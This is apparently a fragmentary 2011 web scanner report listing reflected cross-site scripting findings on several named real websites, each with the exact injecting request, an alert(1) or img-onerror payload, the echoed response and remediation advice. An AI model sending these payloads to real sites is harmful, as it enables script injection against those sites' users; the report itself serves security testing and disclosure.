GET /vetrinanews.asp?1f5da"><script>alert(1)</script>e77b82b7423=1 HTTP/1.1 Host: expertsystem.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=151171949.1304389760.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=151171949.2104177006.1304389760.1304389760.1304392426.2; ASPSESSIONIDCACDTTDR=IFEIGGPCDGDEKIALMBLFBGCI; __utmc=151171949; __utmb=151171949.1.10.1304392426;
Response
HTTP/1.1 200 OK Connection: close Date: Mon, 02 May 2011 22:20:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 14762 Content-Type: text/html Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
4.9. http://finanza-mercati.ilsole24ore.com/quotazioni.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://finanza-mercati.ilsole24ore.com
Path: /quotazioni.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1267"%3balert(1)//2fb7953fc53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e1267";alert(1)//2fb7953fc53 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /quotazioni.php?e1267"%3balert(1)//2fb7953fc53=1 HTTP/1.1 Host: finanza-mercati.ilsole24ore.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:25:38 GMT Server: Apache/2.2.10 (Linux/SUSE) X-Powered-By: PHP/5.2.14 Vary: Accept-Encoding,User-Agent Connection: close Content-Type: text/html Content-Length: 103141
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content ...[SNIP]... antirmi che si ricarica la pagina corrente var inputEl;
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 4e760<script>alert(1)</script>c08eaae6482 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:19:01 GMT Server: Apache P3P: policyref="http://adv.alice.it/w3c/p3p.xml", CP=" NOI DSP COR NID", policyref="http://geoisp.alice.it/policy/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT CNT" cache-control: private, must-revalidate, max-age=120 Content-Length: 68 Content-Type: text/html
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload debe2<img%20src%3da%20onerror%3dalert(1)>3afc08da00f was submitted in the REST URL parameter 3. This input was echoed as debe2<img src=a onerror=alert(1)>3afc08da00f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Date: Mon, 02 May 2011 22:46:28 GMT Content-Length: 452
<html> <head><title>404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name adebe2<img src=a onerror=alert(1)>3afc08da00f.</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 6461a<img%20src%3da%20onerror%3dalert(1)>ceb055b54ca was submitted in the REST URL parameter 3. This input was echoed as 6461a<img src=a onerror=alert(1)>ceb055b54ca in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET //clicktrack-r/activity/activity.gif6461a<img%20src%3da%20onerror%3dalert(1)>ceb055b54ca HTTP/1.1 Host: go.techtarget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;
Response
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Connection: close Date: Mon, 02 May 2011 22:25:49 GMT Content-Length: 1327
<html> <head><title>404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name activity.gif6461a<img src=a onerror=alert(1)>ceb055b54ca.</h1> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload afbcf<img%20src%3da%20onerror%3dalert(1)>3250be4ac70 was submitted in the REST URL parameter 2. This input was echoed as afbcf<img src=a onerror=alert(1)>3250be4ac70 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /activity/activity.gifafbcf<img%20src%3da%20onerror%3dalert(1)>3250be4ac70 HTTP/1.1 Host: go.techtarget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;
Response (redirected)
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Connection: close Date: Mon, 02 May 2011 22:26:01 GMT Content-Length: 1322
<html> <head><title>404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name activity.gifafbcf<img src=a onerror=alert(1)>3250be4ac70.</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 52d48<img%20src%3da%20onerror%3dalert(1)>9a5a459849d was submitted in the REST URL parameter 3. This input was echoed as 52d48<img src=a onerror=alert(1)>9a5a459849d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Date: Mon, 02 May 2011 22:46:32 GMT Content-Length: 1293
<html> <head><title>404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name a52d48<img src=a onerror=alert(1)>9a5a459849d.</h1> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 11f14<img%20src%3da%20onerror%3dalert(1)>973664cfb2d was submitted in the REST URL parameter 3. This input was echoed as 11f14<img src=a onerror=alert(1)>973664cfb2d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /clicktrack-r/activity/activity.gif11f14<img%20src%3da%20onerror%3dalert(1)>973664cfb2d HTTP/1.1 Host: go.techtarget.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmv=; ugcCltHeight=; tt_prereg=t1@2240031635%24_2011-05-02%2021%3A29%3A36%26g%3D212087; bk=440e4ed4-5c74-423d-ae57-3ca0a3d609c7; bn_u=UNASSIGNED; __utmz=1.1304389783.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); tt_ui=%7B%22fontSize%22%3A0%2C%22lastSite%22%3A%22searchcio-midmarket.techtarget.com%22%7D; __utma=1.51700285.1304389783.1304389783.1304389783.1; __utmc=1; __utmb=1.2.10.1304389783;
Response
HTTP/1.1 404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d. Server: Resin/3.1.8 Content-Type: text/html; charset=utf-8 Connection: close Date: Mon, 02 May 2011 22:25:50 GMT Content-Length: 1326
<html> <head><title>404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.</title></head> <body> <h1>404 There is no Action mapped for namespace /activity and action name activity.gif11f14<img src=a onerror=alert(1)>973664cfb2d.</h1> ...[SNIP]...
The value of the clicktag request parameter is copied into the HTML document as plain text between tags. The payload 73271<script>alert(1)</script>85f49d12bf0 was submitted in the clicktag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the clicktag request parameter is copied into the HTML document as plain text between tags. The payload 1f911<script>alert(1)</script>751eacaf9bd was submitted in the clicktag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]1f911<script>alert(1)</script>751eacaf9bd&rnd=[RANDOM] HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:05:27 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Pragma: no-cache Cache-Control: no-cache Connection: close Content-Type: application/x-javascript Content-Length: 3514
4.18. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ieo.solution.weborama.fr
Path: /fcgi-bin/adserv.fcgi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d4392<script>alert(1)</script>33066bb2dad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
4.19. http://ieo.solution.weborama.fr/fcgi-bin/adserv.fcgi [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://ieo.solution.weborama.fr
Path: /fcgi-bin/adserv.fcgi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 2a192<script>alert(1)</script>ef25b6f5bf6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /fcgi-bin/adserv.fcgi?tag=496052&f=2149&ef=1&clicktag=[URLTRACKING]&rnd=[RANDOM]&2a192<script>alert(1)</script>ef25b6f5bf6=1 HTTP/1.1 Host: ieo.solution.weborama.fr Proxy-Connection: keep-alive Referer: http://www.ilsole24ore.com/?refresh_ce User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response (redirected)
HTTP/1.1 200 OK Date: Mon, 02 May 2011 23:05:39 GMT Server: Apache P3P: CP="NOI DSP COR CURa DEVa PSAa OUR STP UNI DEM" Pragma: no-cache Cache-Control: no-cache Connection: close Content-Type: application/x-javascript Content-Length: 3669
4.20. http://webshop.elsevier.com/forgotpassword.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://webshop.elsevier.com
Path: /forgotpassword.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd172"><script>alert(1)</script>0b5c9abc8b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /forgotpassword.html?bd172"><script>alert(1)</script>0b5c9abc8b8=1 HTTP/1.1 Host: webshop.elsevier.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CFTOKEN=76495853; ELSEVIER_ESTREET=%7Bts%20%272011%2D05%2D03%2000%3A00%3A00%27%7D; __utmz=84352454.1304389900.1.1.utmcsr=elsevier.com|utmccn=(referral)|utmcmd=referral|utmcct=/wps/find/journaldescription.cws_home/939/description; CFID=1230652; __utma=84352454.1435850867.1304389900.1304389900.1304389900.1; __utmc=84352454; __utmb=84352454.1.10.1304389900;
Response
HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: Microsoft-IIS/7.0 Date: Mon, 02 May 2011 22:33:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Developed by Ritense webtechnology --> <!-- http://www.ritense.com ...[SNIP]... <form name="forgotPasswordForm" id="forgotPasswordForm" action="/redirect.cfm?404;http://webshop.elsevier.com:80/forgotpassword.html?bd172"><script>alert(1)</script>0b5c9abc8b8=1" method="post" class="logincontainer" onsubmit="return _CF_checkforgotPasswordForm(this)"> ...[SNIP]...
The value of the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 252f0"><script>alert(1)</script>79e7f504dc5 was submitted in the %27--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x00003C)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the d46 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 88da4"><script>alert(1)</script>91d57d817b5 was submitted in the d46 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Content-Type: text/html;charset=utf-8 Server: Microsoft-IIS/7.0 Date: Mon, 02 May 2011 22:51:23 GMT Content-Length: 13277
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<!-- Developed by Ritense webtechnology --> <!-- http://www.ritense.com ...[SNIP]... <form name="loginForm" id="loginForm" action="/login.cfm?d4688da4"><script>alert(1)</script>91d57d817b5" method="post" target="actionFrame" class="logincontainer" onsubmit="return _CF_checkloginForm(this)"> ...[SNIP]...
4.23. https://webshop.elsevier.com/login.cfm [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: https://webshop.elsevier.com
Path: /login.cfm
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46e2"><script>alert(1)</script>03772b18c61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31df3"-alert(1)-"249e5036cfd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php31df3"-alert(1)-"249e5036cfd HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 02 May 2011 22:27:42 GMT Server: Apache X-Powered-By: PHP/5.2.16 Set-Cookie: PHPSESSID=m9ica98kbm5dt73tgro89dvv23; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1352 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f0232:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <script type="text/javascript"> var u = "/404/bookmark.php31df3"-alert(1)-"249e5036cfd"; if (window._gat) { var gaPageTracker = _gat._getTracker("UA-1170033-1"); gaPageTracker._setDomainName("www.addthis.com"); gaPageTracker._setCustomVar(1,"Login","False",2); gaPageTrac ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c22ac<script>alert(1)</script>da40de6267f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /bookmark.phpc22ac<script>alert(1)</script>da40de6267f HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.0 404 Not Found Date: Mon, 02 May 2011 22:27:42 GMT Server: Apache X-Powered-By: PHP/5.2.13 Set-Cookie: PHPSESSID=na3eafmrfnuoijcvtu7l23t2p7; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Vary: Accept-Encoding Content-Length: 1378 Connection: close Content-Type: text/html; charset=UTF-8 Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Not found</title> <l ...[SNIP]... <strong>bookmark.phpc22ac<script>alert(1)</script>da40de6267f</strong> ...[SNIP]...
4.26. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.addthis.com
Path: /bookmark.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9b091"-alert(1)-"92e0eaf77ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /bookmark.php/9b091"-alert(1)-"92e0eaf77ed HTTP/1.1 Host: www.addthis.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Mon, 02 May 2011 22:27:28 GMT Server: Apache X-Powered-By: PHP/5.2.13 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 96059
<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>AddThis Social Bookmarking Sharing Button Widget</title> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> ...[SNIP]... <script type="text/javascript"> var u = "/bookmark.php/9b091"-alert(1)-"92e0eaf77ed"; if (window._gat) { var gaPageTracker = _gat._getTracker("UA-1170033-1"); gaPageTracker._setDomainName("www.addthis.com"); gaPageTracker._trackPageview(u); } </script> ...[SNIP]...
4.27. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.camera.it
Path: /1
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1329'-alert(1)-'a5fb0683740 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /1?d1329'-alert(1)-'a5fb0683740=1 HTTP/1.1 Host: www.camera.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="it" lang="it"> <!-- view_gr ...[SNIP]... <![CDATA[ var taber = new XmTaber('agenda_lavori', { wi: 295, queryString: 'd1329'-alert(1)-'a5fb0683740=1' });
//]]> ...[SNIP]...
4.28. http://www.camera.it/1 [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.camera.it
Path: /1
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a2627"><script>alert(1)</script>124a53125c0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /1?a2627"><script>alert(1)</script>124a53125c0=1 HTTP/1.1 Host: www.camera.it Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: _xmcamera=BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo%250ASGFzaHsIOgtub3RpY2UwOgplcnJvcjA6DHdhcm5pbmcwBjoKQHVzZWR7CDsG%250AVDsHVDsIVA%253D%253D--84f86c2ccc477bfc838891a4b6e8156295c20250;
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 22997"%3bf38bccab9aa was submitted in the REST URL parameter 3. This input was echoed as 22997";f38bccab9aa in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /wps/find/advproductsearch.cws_home22997"%3bf38bccab9aa HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24428
Set-Cookie: JSESSIONID=0000Tzc0jT3hhNK1M4Lr4GWcVwL:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78bb0"><img%20src%3da%20onerror%3dalert(1)>67f5c92b011 was submitted in the REST URL parameter 3. This input was echoed as 78bb0"><img src=a onerror=alert(1)>67f5c92b011 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /wps/find/advproductsearch.cws_home78bb0"><img%20src%3da%20onerror%3dalert(1)>67f5c92b011 HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:32 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24970
Set-Cookie: JSESSIONID=0000-BYReYR8yxhLAjFkChZIJkl:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 711ec'><img%20src%3da%20onerror%3dalert(1)>485db6800ac was submitted in the REST URL parameter 3. This input was echoed as 711ec'><img src=a onerror=alert(1)>485db6800ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /wps/find/advproductsearch.cws_home711ec'><img%20src%3da%20onerror%3dalert(1)>485db6800ac HTTP/1.1
Host: www.elsevier.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=000011al0R9NkIX-UtXNPw3ec5X:142fmli5a; __utmz=173272695.1304389822.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=173272695.1382738491.1304389822.1304389822.1304389822.1; __utmc=173272695; __utmb=173272695.1.10.1304389822;
Response
HTTP/1.1 200 OK
Date: Mon, 02 May 2011 22:31:33 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Win32)
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Pragma: no-cache
Vary: User-Agent,Cookie
Content-Length: 24968
Set-Cookie: JSESSIONID=00002FURpPzg7bKWUP9lHpWiGEE:142fmli5a; Path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3 ...[SNIP]... <LI class="lvl2" id="subItem2" onclick='window.location.href="/wps/find/all_products_browse.cws_home711ec'><img src=a onerror=alert(1)>485db6800ac"'> ...[SNIP]...
4.32. http://www.elsevier.com/wps/find/advproductsearch.cws_home [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.elsevier.com
Path:
/wps/find/advproductsearch.cws_home
Issue detail
